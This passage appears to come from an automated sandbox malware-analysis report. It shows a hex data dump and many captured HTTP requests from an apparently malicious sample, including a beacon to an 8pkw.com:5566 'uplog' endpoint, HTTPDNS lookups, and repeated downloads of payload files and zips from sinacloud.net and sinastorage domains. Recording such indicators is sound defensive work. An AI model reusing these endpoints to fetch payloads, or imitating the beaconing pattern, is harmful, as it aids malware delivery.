bc 5e 66 2d e1 ca 90 95 74 8f d2 fb 7b 3b ab 77 87 d3 aa ac ea 47 e9 8f 9f 9f 4f ef ed ec 1c 9e d3 70 b6 9b e2 07 f9 a3 94 bf e6 bf af f2 e2 62 de 3e 4a 3f a5 06 d4 c1 45 b1 dc 6e ab d5 a3 5d 34 68 f3 77 f4 c2 3c 9b 55 57 8f f6 56 ef 52 fc ff 3e fd ff c7 a7 d3 e9 47 47 ff d9 df f5 f7 fc 67 7f cf 1f f1 5f fd 03 ff c0 7f fe 47 fd 4d ff c5 9f f7 07 fd 67 7f ff df fa 9f fd fd ff e0 7f f9 a7 fd 55 ff c5 9f fe 47 fd 17 7f c1 9f f7 3f fe 7d 7f dc 7f f5 37 fe 9d ff f9 1f ff 77 fd 57 7f ff df ff 5f fc f9 7f d0 7f f1 37 fe 29 ff e5 5f ff 47 ff d7 7f d6 df f2 5f fc 31 7f d9 7f f5 f7 ff 8d ff d9 df fb 77 3c be 4b dd 61 3c fe 10 83 c1 ef f9 a3 c7 d3 f9 fa f7 df ed 36 c0 43 a8 a4 ff c5 9f f1 37 a5 ff d9 df f7 e7 a4 ff f9 9f fc 67 a5 ff c5 9f f6 77 a4 ff d5 df f6 77 a7 ff e5 1f fd 47 a5 ff c5 9f f7 d7 85 2f 3c be 4b 20 3b 40 ba bd f4 d0 c0 f3 78 0d 61 a0 5f 7a 0f cd ff d1 ee f8 3f ff cb fe 9c ff fa 4f fb 1b fe f3 3f f9 ef fb cf ff c8 bf e7 d1 d9 f2 75 5e b7 a3 6f 57 8b 7c f4 32 bb c8 bf 5a 3d be 4b ad 86 df df 1b ff 67 7f cf 9f fc 5f fc b9 7f 1b 8d 83 88 f8 5f fd 41 7f d2 7f fe 0f fe a1 44 be ff fc 1f f8 c3 77 ef ff 97 7f e5 9f f2 5f ff 29 7f e1 0d 00 ee 39 00 ff c5 9f f8 27 fd 97 7f d9 df f3 5f fc e9 7f f8 7f fd e7 fc 79 ff e5 1f f2 77 ff 97 7f f1 df f0 9f ff 0d 7f ce 7f 49 5f fd 09 7f f9 7f f9 67 ff bd ff f5 9f fd 47 6c 00 c5 b0 f6 c7 ff f9 df f0 67 fd 17 7f c6 df fd 9f ff 0d 7f c9 7f f1 e7 fd f1 3f f1 13 ff e3 df f7 e7 ec dd db dd 7f 70 70 b0 77 b0 b7 e1 65 bc 7b 7f 4c d3 40 b3 f0 13 3f f1 5f fe 03 7f 19 bd 78 70 ef fe fd fd 4f 77 f6 1e de f0 de a7
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: text/cssContent-Encoding: gzipLast-Modified: Sat, 13 Oct 2018 11:50:08 GMTAccept-Ranges: bytesETag: "0188be3ea62d41:0"Vary: Accept-EncodingServer: Microsoft-IIS/8.5Date: Thu, 05 Dec 2024 13:25:15 GMTContent-Length: 649Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 be f5 8b 7f e3 24 a5 67 91 d5 17 c5 f2 d1 ce a1 fc b9 ca 66 b3 62 79 61 ff 2e 8b a6 dd 6e da eb 32 7f 94 2e ab 65 4e 1f ff 92 df 38 c9 f4 e5 36 7f d7 6e cf f2 69 55 67 6d 51 2d 6d 13 fa 2a 9d 56 65 55 3f 4a 7f 7c 67 07 b0 e8 a5 f1 e4 42 5f 9b 64 d3 b7 17 75 b5 5e ce ec f7 f4 69 7a 55 cc da f9 a3 fb bb 3b ab 77 fa c9 3c 2f 2e e6 ed a3 bd 87 ee 23 83 e0 7d fb c9 dd 6f cd 8a 66 55 66 d7 8f d2 f3 32 7f 77 f8 ad bb f2 79 75 99 d7 e7 65 75 f5 28 9d 17 b3 59 be a4 e6 82 c5 9e a2 21 fd ed ee ec fc ee f4 15 fd 6d bb db 71 dd 09 79 b6 db 6a f5 28 dd 93 8f 2d 98 df 7f 57 01 e9 50 eb 7c 46 5f d3 df 0e 32 bf 40 1f 10 66 55 d6 3e 4a cb fc bc a5 4f e4 b3 ef d6 45 4b 43 d9 5e 54 b3 fc 11 21 db 16 d3 ac dc 2e 6b 6a 40 df a6 e7 d5 92 48 5f fc 80 28 bf ef 00 31 c9 9b 79 36 a3 81 ed ad de a5 f8 3f d1 22 a5 29 58 5e e4 a3 6d fc 8d ff e3 b3 8b 3a f7 87 fd fb 87 03 f7 a9 aa c3 04 7a 8f 52 6f 02 ca 62 99 6f 2b 59 cc f8 e9 63 a2 39 e3 91 95 c5 05 cd fa 4f af 9b b6 38 bf b6 94 f7 30 df fd d4 be c3 9f 5e 09 ac fb 76 d2 95 76 3f 9e 3f 98 de db 3f d7 0f b9 e9 79 b6 28 4a 9a d4 8f ff f3 7f e0 6f f8 af fe fe bf f1 bf fe 73 ff f0 ff fa ef fd 93 3f d6 16 7e f7 c0 5a 3f 0e c9 6c c7 9d ae cb a3 b2 d0 d1 eb 58 79 4a ef 31 76 b6 1d 35 7a 74 5e d4 c4 f2 d5 f9 76 7b bd ca 23 af 00 71 f3 c2 3d fd 3e ec 96 3e 30 6f e0 13 22 82 10 ce 7b 8f 10 22 da a6 46 8e 2c 03 4f ca 6a fa 96 9a d2 67 a1 94 3c 38 d8 db df 45 d7 f4 85 a5 d9 f9 79 94 60 1f f9 04 fb c8 6f a1 d4 ff d4 52 9f 3f d5 99 3a 60 24 e9 c3 80 b8 d3 7c d9 e6 86 25 8d f0 11 d9 52 37 b1 21 93 38 30 4a 03 a6 9a f2 4e 87 00 21 b1 2d 39 fc 17 81 e9 2f f9 7f 00 b2 22 a5 03 ad 04 00 00 Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"$gfbya.n2.eN86niUgmQ-m*VeU?J|gB_du^izU;w</.#}ofUf2wyueu(Y!mqyj(-WP|F_2@fU>JOEKC^T!.kj@H_(1y6?")X^m:zRobo+Yc9O80^vv???y(Jos?~Z?lXyJ1v5zt^v{#q=>>0o"{"F,Ojg<8Ey`oR?:`$|%R7!80JN!-9/"
      Source: global trafficHTTP traffic detected: GET /kss_api/io.php?a=uplog&apiver=905&c=0&gdata=1&softcode=1000011&&lgid=0&f=&x=91317019281 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSiE 6.0; Windows NT 5.1;)Accept-Language: en-chAccept-Encoding: gzip, deflateHost: www.8pkw.com:5566Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.baidu.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.sogou.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.so.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.sina.com.cnRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.baidu.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: shoufeifz.qijianfz.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/data.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/2024-12-05/21_22 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /style.css HTTP/1.1Accept: */*Referer: http://shoufeifz.qijianfz.com/Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: shoufeifz.qijianfz.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/data.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /d?dn=sinacloud.net HTTP/1.1User-Agent: D74384FB8D2C9Host: 182.254.116.116
      Source: global trafficHTTP traffic detected: GET /d?dn=sinacloud.net HTTP/1.1User-Agent: D74384FB8D2C9Host: 114.114.114.114
      Source: global trafficHTTP traffic detected: GET /d?dn=sinacloud.net HTTP/1.1User-Agent: D74384FB8D2C9Host: 119.29.29.29
      Source: global trafficHTTP traffic detected: GET /question/2024-12-05/21_22 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/data.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/2024-12-05/21_22 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /d?dn=sinacloud.net HTTP/1.1User-Agent: D74384FB8D2C9Host: 114.114.114.114
      Source: global trafficHTTP traffic detected: GET /question/data.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/2024-12-05/21_22 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/data.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/2024-12-05/21_22 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.com HTTP/1.1User-Agent: D74384FB8D2C9Host: 119.29.29.29
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.com HTTP/1.1User-Agent: D74384FB8D2C9Host: 182.254.116.116
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.com HTTP/1.1User-Agent: D74384FB8D2C9Host: 182.254.116.116
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.com HTTP/1.1User-Agent: D74384FB8D2C9Host: 119.29.29.29
      Source: global trafficHTTP traffic detected: GET /question/2024-12-05/21_22 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/data.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.com HTTP/1.1User-Agent: D74384FB8D2C9Host: 114.114.114.114
      Source: global trafficHTTP traffic detected: GET /question/2024-12-05/21_22 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.cnRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/data.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.cnRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.com HTTP/1.1User-Agent: D74384FB8D2C9Host: 114.114.114.114
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.cn HTTP/1.1User-Agent: D74384FB8D2C9Host: 119.29.29.29
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.cn HTTP/1.1User-Agent: D74384FB8D2C9Host: 119.29.29.29
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.cn HTTP/1.1User-Agent: D74384FB8D2C9Host: 182.254.116.116
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.cn HTTP/1.1User-Agent: D74384FB8D2C9Host: 182.254.116.116
      Source: global trafficHTTP traffic detected: GET /question/data.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.cnRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/2024-12-05/21_22 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.cnRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/vc8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/vc8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/vc8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.cnRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/vc8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.cnRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/vc8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.cn HTTP/1.1User-Agent: D74384FB8D2C9Host: 114.114.114.114
      Source: global trafficHTTP traffic detected: GET /question/vc8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.cn HTTP/1.1User-Agent: D74384FB8D2C9Host: 114.114.114.114
      Source: global trafficHTTP traffic detected: GET /question/vc8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/vc8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/s6paies HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/s6paies HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/s6paies HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.cnRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.cn HTTP/1.1User-Agent: A2F0jleksHost: 119.29.29.29
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.cn HTTP/1.1User-Agent: A2F0jleksHost: 182.254.116.116
      Source: global trafficHTTP traffic detected: GET /question/s6paies HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.cnRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/s6paies HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/s6paies HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /d?dn=sinacloud.net HTTP/1.1User-Agent: A2F0jleksHost: 119.29.29.29
      Source: global trafficHTTP traffic detected: GET /d?dn=sinacloud.net HTTP/1.1User-Agent: A2F0jleksHost: 114.114.114.114
      Source: global trafficHTTP traffic detected: GET /d?dn=sinacloud.net HTTP/1.1User-Agent: A2F0jleksHost: 182.254.116.116
      Source: global trafficHTTP traffic detected: GET /question/s6paies HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/s6paies HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/o6saettr.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.cnRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.cn HTTP/1.1User-Agent: A2F0jleksHost: 114.114.114.114
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.cn HTTP/1.1User-Agent: A2F0jleksHost: 182.254.116.116
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.cn HTTP/1.1User-Agent: A2F0jleksHost: 119.29.29.29
      Source: global trafficHTTP traffic detected: GET /question/o6saettr.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.cnRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/o6saettr.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/o6saettr.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /d?dn=sinacloud.net HTTP/1.1User-Agent: A2F0jleksHost: 119.29.29.29
      Source: global trafficHTTP traffic detected: GET /d?dn=sinacloud.net HTTP/1.1User-Agent: A2F0jleksHost: 182.254.116.116
      Source: global trafficHTTP traffic detected: GET /question/o6saettr.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/o6saettr.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/o6saettr.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.com HTTP/1.1User-Agent: A2F0jleksHost: 119.29.29.29
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.com HTTP/1.1User-Agent: A2F0jleksHost: 182.254.116.116
      Source: global trafficHTTP traffic detected: GET /d?dn=sinacloud.net HTTP/1.1User-Agent: A2F0jleksHost: 114.114.114.114
      Source: global trafficHTTP traffic detected: GET /question/o6saettr.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/c6tmassa HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.cnRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.cn HTTP/1.1User-Agent: A2F0jleksHost: 182.254.116.116
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.cn HTTP/1.1User-Agent: A2F0jleksHost: 119.29.29.29
      Source: global trafficHTTP traffic detected: GET /question/c6tmassa HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.cnRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.com HTTP/1.1User-Agent: A2F0jleksHost: 114.114.114.114
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.cn HTTP/1.1User-Agent: A2F0jleksHost: 114.114.114.114
      Source: global trafficHTTP traffic detected: GET /question/c6tmassa HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.com HTTP/1.1User-Agent: A2F0jleksHost: 182.254.116.116
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.com HTTP/1.1User-Agent: A2F0jleksHost: 119.29.29.29
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.com HTTP/1.1User-Agent: A2F0jleksHost: 114.114.114.114
      Source: global trafficHTTP traffic detected: GET /question/c6tmassa HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/c6tmassa HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/c6tmassa HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /d?dn=sinacloud.net HTTP/1.1User-Agent: A2F0jleksHost: 119.29.29.29
      Source: global trafficHTTP traffic detected: GET /d?dn=sinacloud.net HTTP/1.1User-Agent: A2F0jleksHost: 182.254.116.116
      Source: global trafficHTTP traffic detected: GET /d?dn=sinacloud.net HTTP/1.1User-Agent: A2F0jleksHost: 114.114.114.114
      Source: global trafficHTTP traffic detected: GET /question/c6tmassa HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/c6tmassa HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/l6tbasser.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.com HTTP/1.1User-Agent: A2F0jleksHost: 114.114.114.114
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.com HTTP/1.1User-Agent: A2F0jleksHost: 182.254.116.116
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.com HTTP/1.1User-Agent: A2F0jleksHost: 119.29.29.29
      Source: global trafficHTTP traffic detected: GET /question/l6tbasser.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.comRange: bytes=0-Connection: Keep-Alive
